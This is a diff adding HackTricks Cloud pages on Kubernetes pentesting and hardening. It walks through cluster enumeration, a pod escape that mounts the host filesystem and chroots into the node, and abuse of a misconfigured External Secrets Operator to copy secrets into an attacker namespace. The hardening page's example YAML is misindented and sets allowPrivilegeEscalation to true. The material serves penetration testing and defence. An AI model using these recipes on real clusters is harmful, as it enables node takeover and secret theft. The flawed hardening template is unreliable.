+kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
+```
+{% endtab %}
+{% endtabs %}
+
+### Get configMap
+
+configMap always contains a lot of information and configfile that provide to apps which run in the kubernetes. Usually You can find a lot of password, secrets, tokens which used to connecting and validating to other internal/external service.
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get configmaps # -n namespace
+```
+{% endtab %}
+
+{% tab title="API" %}
+```bash
+kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps 
+```
+{% endtab %}
+{% endtabs %}
+
+### Get Network Policies / Cilium Network Policies
+
+{% tabs %}
+{% tab title="First Tab" %}
+```bash
+k get networkpolicies
+k get CiliumNetworkPolicies
+k get CiliumClusterwideNetworkPolicies
+```
+{% endtab %}
+{% endtabs %}
+
+### Get Everything / All
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get all
+```
+{% endtab %}
+{% endtabs %}
+
+### **Get all resources managed by helm**
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'
+```
+{% endtab %}
+{% endtabs %}
+
+### **Get Pods consumptions**
+
+{% tabs %}
+{% tab title="kubectl" %}
+```bash
+k top pod --all-namespaces
+```
+{% endtab %}
+{% endtabs %}
+
+### Escaping from the pod
+
+If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
+
+```bash
+kubectl get pod <name> [-n <namespace>] -o yaml
+```
+
+> if you need create pod on the specific node, you can use following command to get labels on node
+>
+> `k get nodes --show-labels`
+>
+> Commonly, kubernetes.io/hostname and node-role.kubernetes.io/master are all good label for select.
+
+Then you create your attack.yaml file
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  labels:
+    run: attacker-pod
+  name: attacker-pod
+  namespace: default
+spec:
+  volumes:
+  - name: host-fs
+    hostPath:
+      path: /
+  containers:
+  - image: ubuntu
+    imagePullPolicy: Always
+    name: attacker-pod
+    command: ["/bin/sh", "-c", "sleep infinity"]
+    volumeMounts:
+      - name: host-fs
+        mountPath: /root
+  restartPolicy: Never
+  # nodeName and nodeSelector enable one of them when you need to create pod on the specific node
+  #nodeName: master
+  #nodeSelector:
+  #  kubernetes.io/hostname: master 
+  # or using
+  #  node-role.kubernetes.io/master: ""
+```
+
+[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
+
+After that you create the pod
+
+```bash
+kubectl apply -f attacker.yaml [-n <namespace>]
+```
+
+Now you can switch to the created pod as follows
+
+```bash
+kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
+```
+
+And finally you chroot into the node's system
+
+```bash
+chroot /root /bin/bash
+```
+
+Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
+
+## References
+
+{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md b/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
new file mode 100644
index 0000000000..446545efba
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
@@ -0,0 +1,118 @@
+# External Secret Operator
+
+**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
+
+This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets.
+
+## Disclaimer
+
+The technique showed below can only work when certain circumstances are met. For instance, it depends on the requirements needed to allow a secret to be synched on a namespace that you own / compromised. You need to figure it out by yourself.
+
+## Prerequisites
+
+1. A foothold in a kubernetes / openshift cluster with admin privileges on a namespace
+2. Read access on at least ExternalSecret at cluster level
+3. Figure out if there are any required labels / annotations or group membership needed which allows ESO to sync your secret. If you're lucky, you can freely steal any defined secret.
+
+### Gathering information about existing ClusterSecretStore
+
+Assuming that you have a users which has enough rights to read this resource; start by first listing existing _**ClusterSecretStores**_.
+
+```sh
+kubectl get ClusterSecretStore
+```
+
+### ExternalSecret enumeration
+
+Let's assume you found a ClusterSecretStore named _**mystore**_. Continue by enumerating its associated externalsecret.
+
+```sh
+kubectl get externalsecret -A | grep mystore
+```
+
+_This resource is namespace scoped so unless you already know which namespace to look for, add the -A option to look across all namespaces._
+
+
+
+You should get a list of defined externalsecret. Let's assume you found an externalsecret object called _**mysecret**_ defined and used by namespace _**mynamespace**_. Gather a bit more information about what kind of secret it holds.
+
+```sh
+kubectl get externalsecret myexternalsecret -n mynamespace -o yaml
+```
+
+### Assembling the pieces
+
+From here you can get the name of one or multiple secret names (such as defined in the Secret resource). You will an output similar to:
+
+```yaml
+kind: ExternalSecret
+metadata:
+  annotations:
+  ...
+  labels:
+  ...
+spec:
+  data:
+  - remoteRef:
+      conversionStrategy: Default
+      decodingStrategy: None
+      key: SECRET_KEY
+    secretKey: SOME_PASSWORD
+    ...
+```
+
+So far we got:
+
+* Name a ClusterSecretStore
+* Name of an ExternalSecret
+* Name of  the secret
+
+Now that we have everything we need, you can create an ExternalSecret (and eventually patch/create a new Namespace to comply with prerequisites needed to get your new secret synced ):
+
+```yaml
+kind: ExternalSecret
+metadata:
+  name: myexternalsecret
+  namespace: evilnamespace
+spec:
+  data:
+  - remoteRef:
+      conversionStrategy: Default
+      decodingStrategy: None
+      key: SECRET_KEY
+    secretKey: SOME_PASSWORD
+  refreshInterval: 30s
+  secretStoreRef:
+    kind: ClusterSecretStore
+    name: mystore
+  target:
+    creationPolicy: Owner
+    deletionPolicy: Retain
+    name: leaked_secret
+```
+
+```yaml
+ kind: Namespace
+ metadata:
+   annotations:
+     required_annotation: value
+     other_required_annotation: other_value
+   labels:
+     required_label: somevalue
+     other_required_label: someothervalue
+   name: evilnamespace
+```
+
+After a few mins, if sync conditions were met, you should be able to view the leaked secret inside your namespace
+
+```sh
+kubectl get secret leaked_secret -o yaml
+```
+
+
+
+## References
+
+{% embed url="https://external-secrets.io/latest/" %}
+
+{% embed url="https://github.com/external-secrets/external-secrets" %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md b/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
new file mode 100644
index 0000000000..87d58ffac6
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
@@ -0,0 +1,200 @@
+# Kubernetes Hardening
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Tools to analyse a cluster
+
+### [**Kubescape**](https://github.com/armosec/kubescape)
+
+[**Kubescape**](https://github.com/armosec/kubescape) is a K8s open-source tool providing a multi-cloud K8s single pane of glass, including risk analysis, security compliance, RBAC visualizer and image vulnerabilities scanning. Kubescape scans K8s clusters, YAML files, and HELM charts, detecting misconfigurations according to multiple frameworks (such as the [NSA-CISA](https://www.armosec.io/blog/kubernetes-hardening-guidance-summary-by-armo) , [MITRE ATT\&CK®](https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/)), software vulnerabilities, and RBAC (role-based-access-control) violations at early stages of the CI/CD pipeline, calculates risk score instantly and shows risk trends over time.
+
+```bash
+kubescape scan --verbose
+```
+
+### [**Kube-bench**](https://github.com/aquasecurity/kube-bench)
+
+The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
+You can choose to:
+
+* run kube-bench from inside a container (sharing PID namespace with the host)
+* run a container that installs kube-bench on the host, and then run kube-bench directly on the host
+* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
+* compile it from source.
+
+### [**Kubeaudit**](https://github.com/Shopify/kubeaudit)
+
+The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
+
+Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:
+
+```
+kubeaudit all
+```
+
+This tool also has the argument `autofix` to **automatically fix detected issues.**
+
+### [**Kube-hunter**](https://github.com/aquasecurity/kube-hunter)
+
+The tool [**kube-hunter**](https://github.com/aquasecurity/kube-hunter) hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments.
+
+```bash
+kube-hunter --remote some.node.com
+```
+
+### [**Kubei**](https://github.com/Erezf-p/kubei)
+
+[**Kubei**](https://github.com/Erezf-p/kubei) is a vulnerabilities scanning and CIS Docker benchmark tool that allows users to get an accurate and immediate risk assessment of their kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods.
+
+### [**KubiScan**](https://github.com/cyberark/KubiScan)
+
+[**KubiScan**](https://github.com/cyberark/KubiScan) is a tool for scanning Kubernetes cluster for risky permissions in Kubernetes's Role-based access control (RBAC) authorization model.
+
+### [Managed Kubernetes Auditing Toolkit](https://github.com/DataDog/managed-kubernetes-auditing-toolkit)
+
+[**Mkat**](https://github.com/DataDog/managed-kubernetes-auditing-toolkit) is a tool built to test other type of high risk checks compared with the other tools. It mainly have 3 different modes:
+
+* **`find-role-relationships`**: Which will find which AWS roles are running in which pods
+* **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.
+* **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!
+
+## **Audit IaC Code**
+
+### [**Popeye**](https://github.com/derailed/popeye)
+
+[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over\_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
+
+### [**KICS**](https://github.com/Checkmarx/kics)
+
+[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications
+
+### [**Checkov**](https://github.com/bridgecrewio/checkov)
+
+[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code.
+
+It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning.
+
+### [**Kube-score**](https://github.com/zegl/kube-score)
+
+[**kube-score**](https://github.com/zegl/kube-score) is a tool that performs static code analysis of your Kubernetes object definitions.
+
+To install:
+
+| Distribution                                        | Command / Link                                                                          |
+| --------------------------------------------------- | --------------------------------------------------------------------------------------- |
+| Pre-built binaries for macOS, Linux, and Windows    | [GitHub releases](https://github.com/zegl/kube-score/releases)                          |
+| Docker                                              | `docker pull zegl/kube-score` ([Docker Hub)](https://hub.docker.com/r/zegl/kube-score/) |
+| Homebrew (macOS and Linux)                          | `brew install kube-score`                                                               |
+| [Krew](https://krew.sigs.k8s.io/) (macOS and Linux) | `kubectl krew install score`                                                            |
+
+## Tips
+
+### Kubernetes PodSecurityContext and SecurityContext
+
+You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). For more information read:
+
+{% content-ref url="kubernetes-securitycontext-s.md" %}
+[kubernetes-securitycontext-s.md](kubernetes-securitycontext-s.md)
+{% endcontent-ref %}
+
+### Kubernetes API Hardening
+
+It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.\
+It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.
+
+**Common Request process:**\
+User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control.
+
+**Tips**:
+
+* Close ports.
+* Avoid Anonymous access.
+* NodeRestriction; No access from specific nodes to the API.
+  * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
+  * Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
+  * And also, allows kubelets to add/remove/update these labels and label prefixes.
+* Ensure with labels the secure workload isolation.
+* Avoid specific pods from API access.
+* Avoid ApiServer exposure to the internet.
+* Avoid unauthorized access RBAC.
+* ApiServer port with firewall and IP whitelisting.
+
+### SecurityContext Hardening
+
+By default root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: security-context-demo
+spec:
+  securityContext:
+    runAsUser: 1000
+    runAsGroup: 3000
+    fsGroup: 2000
+  volumes:
+  - name: sec-ctx-vol
+    emptyDir: {}
+  containers:
+  - name: sec-ctx-demo
+    image: busybox
+    command: [ "sh", "-c", "sleep 1h" ]
+   securityContext:
+    runAsNonRoot: true
+    volumeMounts:
+    - name: sec-ctx-vol
+      mountPath: /data/demo
+    securityContext:
+      allowPrivilegeEscalation: true
+```
+
+* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+
+### General Hardening
+
+You should update your Kubernetes environment as frequently as necessary to have:
+
+* Dependencies up to date.
+* Bug and security patches.
+
+[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)
+
+**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
+
+* Upgrade the Master Node components following this sequence:
+  * etcd (all instances).
+  * kube-apiserver (all control plane hosts).
+  * kube-controller-manager.
+  * kube-scheduler.
+  * cloud controller manager, if you use one.
+* Upgrade the Worker Node components such as kube-proxy, kubelet.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md b/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
new file mode 100644
index 0000000000..12734b41b1
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
@@ -0,0 +1,88 @@
+# Kubernetes SecurityContext(s)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## PodSecurityContext <a href="#podsecuritycontext-v1-core" id="podsecuritycontext-v1-core"></a>
+
+[**From the docs:**](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
+
+When specifying the security context of a Pod you can use several attributes. From a defensive security point of view you should consider:
+
+* To have **runASNonRoot** as **True**
+* To configure **runAsUser**
+* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
+* Do **NOT** give **privilege** **group** access via **runAsGroup** and **supplementaryGroups**
+
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>fsGroup</strong></a><br><em>integer</em></p>                                                                                                                                                                                                                                                 | <p>A special supplemental group that applies to <strong>all containers in a pod</strong>. Some volume types allow the Kubelet to <strong>change the ownership of that volume</strong> to be owned by the pod:<br>1. The owning GID will be the FSGroup<br>2. The setgid bit is set (new files created in the volume will be owned by FSGroup)<br>3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume</p> |
+| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>fsGroupChangePolicy</strong></a><br><em>string</em></p>                                                                                                                                                                                                                                      | This defines behavior of **changing ownership and permission of the volume** before being exposed inside Pod.                                                                                                                                                                                                                                                                                                                                                                         |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>runAsGroup</strong></a><br><em>integer</em></p>                                                                                                                                                                                                                                              | The **GID to run the entrypoint of the container process**. Uses runtime default if unset. May also be set in SecurityContext.                                                                                                                                                                                                                                                                                                                                                        |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>runAsNonRoot</strong></a><br><em>boolean</em></p>                                                                                                                                                                                                                                            | Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does.                                                                                                                                                                                                                                                                          |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>runAsUser</strong></a><br><em>integer</em></p>                                                                                                                                                                                                                                               | The **UID to run the entrypoint of the container process**. Defaults to user specified in image metadata if unspecified.                                                                                                                                                                                                                                                                                                                                                              |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>seLinuxOptions</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#selinuxoptions-v1-core"><em>SELinuxOptions</em></a><br><em>More info about</em> <em><strong>seLinux</strong></em></p>                                                           | The **SELinux context to be applied to all containers**. If unspecified, the container runtime will allocate a random SELinux context for each container.                                                                                                                                                                                                                                                                                                                             |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>seccompProfile</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#seccompprofile-v1-core"><em>SeccompProfile</em></a><br><em>More info about</em> <em><strong>Seccomp</strong></em></p>                                                           | The **seccomp options to use by the containers** in this pod.                                                                                                                                                                                                                                                                                                                                                                                                                         |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>supplementalGroups</strong></a><br><em>integer array</em></p>                                                                                                                                                                                                                                | A list of **groups applied to the first process run in each container**, in addition to the container's primary GID.                                                                                                                                                                                                                                                                                                                                                                  |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>sysctls</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#sysctl-v1-core"><em>Sysctl</em></a> <em>array</em><br><em>More info about</em> <a href="https://www.garron.me/en/go2linux/sysctl-linux.html"><em><strong>sysctls</strong></em></a></p> | Sysctls hold a list of **namespaced sysctls used for the pod**. Pods with unsupported sysctls (by the container runtime) might fail to launch.                                                                                                                                                                                                                                                                                                                                        |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>windowsOptions</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#windowssecuritycontextoptions-v1-core"><em>WindowsSecurityContextOptions</em></a></p>                                                                                           | The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used.                                                                                                                                                                                                                                                                                                                                               |
+
+## SecurityContext
+
+[**From the docs:**](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
+
+This context is set inside the **containers definitions**. From a defensive security point of view you should consider:
+
+* **allowPrivilegeEscalation** to **False**
+* Do not add sensitive **capabilities** (and remove the ones you don't need)
+* **privileged** to **False**
+* If possible, set **readOnlyFilesystem** as **True**
+* Set **runAsNonRoot** to **True** and set a **runAsUser**
+* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
+* Do **NOT** give **privilege** **group** access via **runAsGroup.**
+
+Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**.
+
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>allowPrivilegeEscalation</strong></a><br><em>boolean</em></p>                                                                                                                                                                      | **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no\_new\_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP\_SYS\_ADMIN** |
+| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>capabilities</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#capabilities-v1-core"><em>Capabilities</em></a><br><em>More info about</em> <em><strong>Capabilities</strong></em></p>  | The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities.                                                                                                                                                                                                                    |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>privileged</strong></a><br><em>boolean</em></p>                                                                                                                                                                                    | Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false.                                                                                                                                                                               |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>procMount</strong></a><br><em>string</em></p>                                                                                                                                                                                      | procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths.                                                                                                                                    |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>readOnlyRootFilesystem</strong></a><br><em>boolean</em></p>                                                                                                                                                                        | Whether this **container has a read-only root filesystem**. Default is false.                                                                                                                                                                                                                                             |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>runAsGroup</strong></a><br><em>integer</em></p>                                                                                                                                                                                    | The **GID to run the entrypoint** of the container process. Uses runtime default if unset.                                                                                                                                                                                                                                |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>runAsNonRoot</strong></a><br><em>boolean</em></p>                                                                                                                                                                                  | Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does.                                                                                                          |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>runAsUser</strong></a><br><em>integer</em></p>                                                                                                                                                                                     | The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified.                                                                                                                                                                                                  |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>seLinuxOptions</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#selinuxoptions-v1-core"><em>SELinuxOptions</em></a><br><em>More info about</em> <em><strong>seLinux</strong></em></p> | The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container.                                                                                                                                                                  |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>seccompProfile</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#seccompprofile-v1-core"><em>SeccompProfile</em></a></p>                                                               | The **seccomp options** to use by this container.                                                                                                                                                                                                                                                                         |
+| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>windowsOptions</strong></a><br><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#windowssecuritycontextoptions-v1-core"><em>WindowsSecurityContextOptions</em></a></p>                                 | The **Windows specific settings** applied to all containers.                                                                                                                                                                                                                                                              |
+
+## References
+
+* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
